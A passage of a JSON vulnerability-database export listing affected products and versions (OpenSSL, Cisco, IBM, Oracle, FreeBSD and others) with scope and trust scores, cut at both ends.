        "version": "01"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "opensuse",
        "scope": null,
        "trust": 0.8,
        "vendor": "opensuse",
        "version": null
      },
      {
        "model": "ip38x/5000",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "ucosminexus application server standard",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "ucosminexus developer",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "professional"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v8.2"
      },
      {
        "model": "fusion middleware",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  oracle access manager 10.1.4.x"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "/sg series  univerge sg3000lg/lj"
      },
      {
        "model": "registered envelope service",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence video communication server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "paging server",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "11.5.1"
      },
      {
        "model": "nexus series switches 5.2 sv3",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "1000v"
      },
      {
        "model": "network performance analytics",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ironport encryption appliance",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "spa51x series ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "mate collector",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ata series analog terminal adaptor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1900"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.0.3"
      },
      {
        "model": "video surveillance series ip cameras",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "30000"
      },
      {
        "model": "security network controller 1.0.3361m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "telepresence server on virtual machine",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.1"
      },
      {
        "model": "network health framework",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "spa232d multi-line dect ata",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2"
      },
      {
        "model": "show and share",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2(1)"
      },
      {
        "model": "digital media manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2.2.1"
      },
      {
        "model": "unified series ip phones",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "780011.5.2"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.3.0.0"
      },
      {
        "model": "clean access manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.0.2"
      },
      {
        "model": "lancope stealthwatch flowcollector netflow",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.22"
      },
      {
        "model": "hosted collaboration mediation fulfillment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.6(3)"
      },
      {
        "model": "10.2-release-p8",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "emergency responder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.5(3.10000.9)"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.3"
      },
      {
        "model": "proactive network operations center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence server mr2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "87104.2"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.40"
      },
      {
        "model": "emergency responder",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5"
      },
      {
        "model": "video distribution suite for internet streaming",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.3.2"
      },
      {
        "model": "digital media manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2.2"
      },
      {
        "model": "mysql server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6"
      },
      {
        "model": "video surveillance media server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.11"
      },
      {
        "model": "project openssl 1.0.1e",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "lancope stealthwatch udp director",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8.2"
      },
      {
        "model": "nexus series blade switches 0.9.8zf",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4000"
      },
      {
        "model": "telepresence isdn link",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.1.6"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.5"
      },
      {
        "model": "project openssl 1.0.2g",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "tivoli composite application manager for transactions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3.0.1"
      },
      {
        "model": "tandberg codian isdn gw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "32400"
      },
      {
        "model": "telepresence sx series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.3.7"
      },
      {
        "model": "project openssl 1.0.1a",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5.1.6"
      },
      {
        "model": "unified intelligent contact management enterprise",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.51"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.4"
      },
      {
        "model": "telepresence mcu",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "85100"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5.1.131"
      },
      {
        "model": "unified workforce optimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "digital media manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2.1"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "12.1.4"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1"
      },
      {
        "model": "lancope stealthwatch flowcollector netflow",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8.1"
      },
      {
        "model": "datapower gateways",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.5.0.2"
      },
      {
        "model": "mysql server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.26"
      },
      {
        "model": "mediasense 9.0",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "abyp-4tl-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.8"
      },
      {
        "model": "powerkvm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "cognos business intelligence interim fix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.119"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.1209"
      },
      {
        "model": "asr series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "50000"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.4.0.0"
      },
      {
        "model": "10.1-release-p26",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "edge digital media player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3400"
      },
      {
        "model": "enterprise content delivery system",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.6.8"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.0.2"
      },
      {
        "model": "prime collaboration assurance sp1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5"
      },
      {
        "model": "tivoli netcool system service monitors fp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "emergency responder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.5(1)"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.29"
      },
      {
        "model": "workload deployer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.16"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.3"
      },
      {
        "model": "unified contact center enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5"
      },
      {
        "model": "unified ip phone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "88310"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.11"
      },
      {
        "model": "intelligent automation for cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.8"
      },
      {
        "model": "jabber guest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.0(2)"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3361"
      },
      {
        "model": "10.1-release-p5",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "unified ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "69010"
      },
      {
        "model": "prime security manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9.5.4.3"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.13-34"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.20"
      },
      {
        "model": "im and presence service",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5"
      },
      {
        "model": "ata analog telephone adaptor",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1879.2.5"
      },
      {
        "model": "tivoli netcool system service monitors fp15",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "jabber guest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "show and share",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5(2)"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.23"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.1"
      },
      {
        "model": "tivoli composite application manager for transactions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.4.0.1"
      },
      {
        "model": "real-time compression appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.2"
      },
      {
        "model": "cloud manager with openstack interim fix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.0.3"
      },
      {
        "model": "prime license manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ucs central 1.5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "prime collaboration deployment",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5"
      },
      {
        "model": "mobile foundation consumer edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.2.0.1"
      },
      {
        "model": "web security appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "series ip phones vpn feature",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8800-11.5.2"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3394"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.2"
      },
      {
        "model": "visual quality experience server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "filenet system monitor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "project openssl 1.0.1t",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "anyconnect secure mobility client for windows",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.3"
      },
      {
        "model": "content security management appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "10.1-release-p28",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "agent for openflow",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.4.0"
      },
      {
        "model": "netezza platform software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0.3"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.1"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.1"
      },
      {
        "model": "image construction and composition tool",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3.1.0"
      },
      {
        "model": "webex recording playback client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "prime collaboration assurance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "asa next-generation firewall services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "9.3-release-p38",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.6"
      },
      {
        "model": "telepresence content server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "tandberg codian mse model",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "83200"
      },
      {
        "model": "mysql enterprise backup",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "3.10.1"
      },
      {
        "model": "local collector appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.2.8"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.11.2"
      },
      {
        "model": "9.3-release-p10",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "9.3-release-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "digital media players series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "44000"
      },
      {
        "model": "mds series multilayer switches",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "90008.3"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.16-37"
      },
      {
        "model": "10.2-release-p13",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "nexus series switches 7.3.1nx",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5000"
      },
      {
        "model": "service delivery manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.1"
      },
      {
        "model": "opensuse evergreen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11.4"
      },
      {
        "model": "prime infrastructure standalone plug and play gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "spa50x series ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "webex meetings for blackberry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "tivoli netcool system service monitors interim fix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.014-01"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.24"
      },
      {
        "model": "security identity manager virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.3"
      },
      {
        "model": "lancope stealthwatch flowcollector sflow",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "project openssl 1.0.1g",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "media experience engines",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.5.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.0"
      },
      {
        "model": "exalogic infrastructure",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "2.0"
      },
      {
        "model": "tivoli netcool system service monitors fp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.4"
      },
      {
        "model": "telepresence integrator c series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.3.7"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5"
      },
      {
        "model": "anyconnect secure mobility client",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.2"
      },
      {
        "model": "wide area application services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "mysql server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.7"
      },
      {
        "model": "datapower gateways",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.5.1.1"
      },
      {
        "model": "workload deployer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "telepresence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "87100"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.1"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.4-23"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.2"
      },
      {
        "model": "10.2-release-p14",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "10.1-release-p17",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.25-57"
      },
      {
        "model": "sterling connect:express for unix ifix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.6.1146-109"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.18-43"
      },
      {
        "model": "cloud manager with openstack interim fix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.5"
      },
      {
        "model": "workload deployer if12",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.0.7"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.1"
      },
      {
        "model": "media services interface",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "nexus intercloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1000v0"
      },
      {
        "model": "media experience engines",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.5"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.0.0"
      },
      {
        "model": "mediasense",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.11.1"
      },
      {
        "model": "ips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "project openssl 1.0.1i",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.4.2"
      },
      {
        "model": "security appscan enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.1"
      },
      {
        "model": "unified workforce optimization quality management sr3 es5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.0"
      },
      {
        "model": "qradar",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0"
      },
      {
        "model": "meetingplace",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.7"
      },
      {
        "model": "security identity manager virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.2"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.913"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.0.1"
      },
      {
        "model": "prime access registrar",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.0.1.7"
      },
      {
        "model": "unified attendant console advanced",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "nexus series switches",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "50006.2.17"
      },
      {
        "model": "anyconnect secure mobility client for ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.0"
      },
      {
        "model": "webex messenger service ep1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.9.9"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.11.3"
      },
      {
        "model": "tivoli provisioning manager for os deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1"
      },
      {
        "model": "mediasense",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5.1"
      },
      {
        "model": "unified ip phone 9.4.2sr3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8961"
      },
      {
        "model": "10.2-release-p9",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "unified wireless ip phone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "project openssl 1.0.1s",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "10.1-release-p27",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "spa122 ata with router",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.4.5"
      },
      {
        "model": "media experience engines",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "sterling connect:express for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.6"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.2"
      },
      {
        "model": "webex meeting center",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.9.1"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "lancope stealthwatch flowcollector netflow",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8.2"
      },
      {
        "model": "webex node for mcs",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.12.9.8"
      },
      {
        "model": "jabber for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "video surveillance 4300e/4500e high-definition ip cameras",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.2.8"
      },
      {
        "model": "mysql server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.20"
      },
      {
        "model": "mobilefirst platform foundation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.0.0"
      },
      {
        "model": "10.2-release-p6",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "cloud manager with openstack interix fix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.0.3"
      },
      {
        "model": "unified sip proxy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "virtual security gateway for microsoft hyper-v",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2(1)"
      },
      {
        "model": "tandberg codian isdn gw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "32100"
      },
      {
        "model": "unified attendant console premium edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "digital media players series 5.4 rb",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4300"
      },
